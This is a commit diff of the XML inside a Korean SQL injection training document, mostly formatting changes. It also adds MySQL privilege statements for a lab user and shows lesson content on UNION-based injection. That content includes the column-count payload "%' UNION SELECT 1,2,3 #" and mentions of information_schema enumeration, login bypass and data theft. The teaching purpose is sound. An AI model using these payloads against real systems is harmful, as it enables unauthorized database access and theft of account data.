<commit_message>
StudentSearchService.java 변경에 따른 문서수정
</commit_message>
<xml_diff>
--- a/docs/security/01_SQL_Injection.docx
+++ b/docs/security/01_SQL_Injection.docx
@@ -94,118 +94,199 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>1. SQL Injection 개념</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>2. SQL 기초와 UNION 문법 (이 앱의 테이블 기준)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>3. 공격 원리 : 입력이 SQL 구문이 되는 과정</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>4. UNION 기반 인젝션 이해</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>5. 취약 코드 구현 (JdbcTemplate / JPA)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>6. 안전 코드 : 파라미터 바인딩</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>7. 실습 : 단계별 공격 재현</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>8. 방어 대책 정리</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>9. 핵심 요약</w:t>
       </w:r>
     </w:p>
@@ -525,20 +606,19 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="ab"/>
         <w:tblW w:w="9000" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000"/>
         </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="2700"/>
@@ -658,6 +738,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>오류 기반 (Error-based)</w:t>
             </w:r>
           </w:p>
@@ -700,7 +781,6 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>블라인드 (Blind)</w:t>
             </w:r>
           </w:p>
@@ -743,53 +823,396 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>인증 우회 : 로그인 조건을 항상 참으로 만들어 비밀번호 없이 로그인</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>정보 유출 : 다른 테이블의 계정 정보, 비밀번호 해시, 개인정보 탈취</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>데이터 위변조/삭제 : UPDATE, DELETE, DROP 등 실행</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="8100C2"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:sdt>
+        <w:sdtPr>
+          <w:tag w:val="goog_rdk_0"/>
+          <w:id w:val="1726827699"/>
+        </w:sdtPr>
+        <w:sdtEndPr/>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
+              <w:color w:val="8100C2"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+            <w:t># Drop 권한 없애기</w:t>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="8100C2"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>REVOKE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="8100C2"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>DROP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="8100C2"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ON</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> boot_db.* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="8100C2"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>FROM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="008000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>'boot'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>@</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="008000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>'%'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SHOW GRANTS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="8100C2"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>FOR</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="008000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>'boot'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>@</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="008000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>'%'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:sdt>
+        <w:sdtPr>
+          <w:tag w:val="goog_rdk_1"/>
+          <w:id w:val="-1661153046"/>
+        </w:sdtPr>
+        <w:sdtEndPr/>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+            </w:rPr>
+            <w:t># 다시 권한 설정</w:t>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="27262E"/>
+        </w:rPr>
+        <w:t>GRANT ALL PRIVILEGES ON boot_db.* TO 'boot'@'%';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">flush privileges; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>DB 구조 탐색 : information_schema를 통해 전체 스키마 파악</w:t>
       </w:r>
     </w:p>
@@ -797,23 +1220,13 @@
       <w:pPr>
         <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:color w:val="C00000"/>
         </w:rPr>
-        <w:t>주의 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="C00000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">주의 : </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">이 교안의 모든 공격 실습은 격리된 교육용 환경(로컬 Docker/DB, 교육용 취약 엔드포인트)에서만 수행한다. </w:t>
@@ -844,16 +1257,7 @@
         <w:spacing w:after="100" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>공격을 이해하려면 최소한의 SQL 문법이 필요</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>합니</w:t>
-      </w:r>
-      <w:r>
-        <w:t>다.</w:t>
+        <w:t>공격을 이해하려면 최소한의 SQL 문법이 필요합니다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -872,20 +1276,19 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="ac"/>
         <w:tblW w:w="9000" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="000000"/>
         </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="2300"/>
@@ -1480,41 +1883,61 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>규칙 1 — 컬럼 개수가 같아야 한다.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> 위 예처럼 양쪽 SELECT가 모두 3개 컬럼이어야 UNION이 성립한다. 개수가 다르면 오류가 난다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>규칙 2 — 각 컬럼의 데이터 타입이 호환되어야 한다.</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> 문자열 자리에는 문자열을 맞추면 무난하다.</w:t>
       </w:r>
     </w:p>
@@ -1869,41 +2292,61 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>컬럼 수가 같아야 한다</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 원본 SELECT가 3개 컬럼이면 UNION 뒤도 3개여야 한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="000000"/>
         </w:rPr>
         <w:t>데이터 타입이 호환되어야 한다</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> — 문자열 자리에 문자열을 맞추면 무난하다.</w:t>
       </w:r>
     </w:p>
@@ -1917,40 +2360,67 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>컬럼 수 확인 : %' UNION SELECT 1,2,3 #  (숫자 행이 나오면 컬럼 수가 맞은 것)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
         <w:spacing w:after="60" w:line="264" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
         <w:t>DB 구조 탐색 : information_schema.tables / columns 조회</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
